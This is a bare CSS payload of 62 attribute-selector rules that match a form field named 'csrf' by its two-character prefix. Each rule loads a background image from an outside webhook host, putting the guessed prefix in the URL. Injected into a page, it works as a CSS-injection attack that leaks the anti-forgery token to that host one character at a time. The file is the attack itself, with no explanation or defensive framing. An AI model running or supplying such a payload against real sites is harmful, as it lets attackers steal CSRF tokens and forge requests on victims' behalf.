input[name="csrf"][value^="ra"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=ra");}
input[name="csrf"][value^="rb"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rb");}
input[name="csrf"][value^="rc"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rc");}
input[name="csrf"][value^="rd"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rd");}
input[name="csrf"][value^="re"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=re");}
input[name="csrf"][value^="rf"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rf");}
input[name="csrf"][value^="rg"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rg");}
input[name="csrf"][value^="rh"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rh");}
input[name="csrf"][value^="ri"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=ri");}
input[name="csrf"][value^="rj"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rj");}
input[name="csrf"][value^="rk"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rk");}
input[name="csrf"][value^="rl"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rl");}
input[name="csrf"][value^="rm"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rm");}
input[name="csrf"][value^="rn"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rn");}
input[name="csrf"][value^="ro"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=ro");}
input[name="csrf"][value^="rp"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rp");}
input[name="csrf"][value^="rq"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rq");}
input[name="csrf"][value^="rr"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rr");}
input[name="csrf"][value^="rs"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rs");}
input[name="csrf"][value^="rt"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rt");}
input[name="csrf"][value^="ru"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=ru");}
input[name="csrf"][value^="rv"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rv");}
input[name="csrf"][value^="rw"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rw");}
input[name="csrf"][value^="rx"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rx");}
input[name="csrf"][value^="ry"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=ry");}
input[name="csrf"][value^="rz"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rz");}
input[name="csrf"][value^="rA"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rA");}
input[name="csrf"][value^="rB"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rB");}
input[name="csrf"][value^="rC"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rC");}
input[name="csrf"][value^="rD"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rD");}
input[name="csrf"][value^="rE"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rE");}
input[name="csrf"][value^="rF"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rF");}
input[name="csrf"][value^="rG"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rG");}
input[name="csrf"][value^="rH"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rH");}
input[name="csrf"][value^="rI"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rI");}
input[name="csrf"][value^="rJ"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rJ");}
input[name="csrf"][value^="rK"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rK");}
input[name="csrf"][value^="rL"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rL");}
input[name="csrf"][value^="rM"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rM");}
input[name="csrf"][value^="rN"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rN");}
input[name="csrf"][value^="rO"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rO");}
input[name="csrf"][value^="rP"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rP");}
input[name="csrf"][value^="rQ"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rQ");}
input[name="csrf"][value^="rR"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rR");}
input[name="csrf"][value^="rS"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rS");}
input[name="csrf"][value^="rT"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rT");}
input[name="csrf"][value^="rU"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rU");}
input[name="csrf"][value^="rV"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rV");}
input[name="csrf"][value^="rW"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rW");}
input[name="csrf"][value^="rX"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rX");}
input[name="csrf"][value^="rY"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rY");}
input[name="csrf"][value^="rZ"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=rZ");}
input[name="csrf"][value^="r0"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=r0");}
input[name="csrf"][value^="r1"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=r1");}
input[name="csrf"][value^="r2"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=r2");}
input[name="csrf"][value^="r3"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=r3");}
input[name="csrf"][value^="r4"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=r4");}
input[name="csrf"][value^="r5"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=r5");}
input[name="csrf"][value^="r6"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=r6");}
input[name="csrf"][value^="r7"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=r7");}
input[name="csrf"][value^="r8"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=r8");}
input[name="csrf"][value^="r9"]{background-image:url("https://zealous-bird-85.webhook.cool/hit?p=r9");}
